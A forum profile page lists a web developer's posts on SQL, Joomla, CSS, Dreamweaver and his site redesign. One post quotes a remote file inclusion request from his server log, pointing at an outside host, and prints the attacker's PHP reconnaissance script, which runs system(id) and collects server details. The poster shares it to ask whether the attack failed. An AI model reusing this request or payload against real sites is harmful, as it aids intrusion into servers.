Skip to content
View in the app

A better way to browse. Learn more.

Web Designer Forum

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Emmanuel

Members
  • Joined

  • Last visited

Everything posted by Emmanuel

  1. Hi, Looks like you will need to locate the SQL code that generates the categories and the simply limit the number of results you want returned.
  2. You need to have some controllers in place. And does the website really have to be just one page? You will probably be making things a lot more difficult for yourself.
  3. Welcome to the site Gary.... Glad to see another glaswegian aboard
  4. Thanks for the comment jlspurling. I am actually considering removing the ads on my site. Waste of valuable space them being there. As for the yellow in the search, that was the outcome of me using the firefox extension Screengrab.
  5. I am in the process of redesigning my website layout. What do you think of the current design I have started with? Any fresh ideas would be very welcome... My current site layout is here http://www.grafikkaos.co.uk Thanks
  6. Anybody in here have experience in design components with Joomla? I have been trying to create a custom component based on SagePay VSP direct. But the Joomla MVC structure is giving me absolute headaches. I have managed to get the default view(which contains the form) to display trying to get another view to show up but all I keep getting is errors. On top of that, I am totally lost with where to put the SagePay code or as to formulate it properly. An expert's perspective would be very welcome here if possible....
  7. Hi, also consider using CSS for your site layout. Frames will tend to make things a bit confusing and using tables for layout is so yesterday.
  8. Emmanuel replied to alen's topic in General Chat
    been spammed as well.....
  9. Hi, you could have a look at PHPList. Its free and open-source.
  10. Figured as much, just need to track the ip address...
  11. If they insist on liking IE, simply install the Aero Basic theme on Firefox to fool them into thinking they are actually using IE.. hehe
  12. While taking a break from some work I was doing, I decide to have a look at the my website log. I do expect to receive the odd 404 errors but this time it was unusually high so i decided to take a closer. It seems to me that some has been attempting to have my website. I seem to have been getting quite a few lines such as this: /article/60-Creating-An-Advanced-CMS-Part-1//include/connect.php=http://www.madolddogs.de//flash/db/id2.txt When I decided to have a look at the id2.txt file, this is what it contained: <?php function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "Osirys<br>"; $un = @php_uname(); $id1 = system(id); $pwd1 = @getcwd(); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "Osirys was here ..<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all<br>"; exit; So far, no pages on my website have been afftected or change in anyway... so I would assume that is a failed hacking attempt right!?
  13. well I think they have considerably improve on the UI. It was due an update anyway. The fact that they have also integrate the ability to work with other ajax frameworks makes it quite useful. Although I have CS4, I am sticking to CS3 for the time being until the Adobe Dreamweaver Developer Toolbox is update. The fact that it also it also integrates nicely with other Cs4 apps is pretty good as well!
  14. Hi You could look at ShadowBox (http://mjijackson.com/shadowbox/). Its pretty good as a lightbox system and its the one I use all the time.
  15. Are you trying to display data from an xml file?
  16. someone pass me some pills... all those colors are making my head spin!!!
  17. I actually did encounter this type of error a good while back when working on a client's website. I think dreamweaver has a general problem dealing with nested websites. If you have moved "mysite 3" to "c:\mysite 3", did u make sure to reconfigure the site settings?
  18. Dreamweaver Cs3 + Aptana Studio - IMO best combination!
  19. Hi, I got round to redesigning my website. Still have a few things to sort out on it but a feedback as to what you think of it at the moment would be appreciated. http://www.grafikkaos.co.uk Thanks, Emmanuel
  20. Looks like a pretty good and clean design to me! Keep up the good work!
  21. Just dropping to say hello to everyone. The name is Emmanuel. I am a web developer based in Glasgow. Glad be part of this community. Looking forward to getting to know you all. My Website: http://www.grafikkaos.co.uk

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.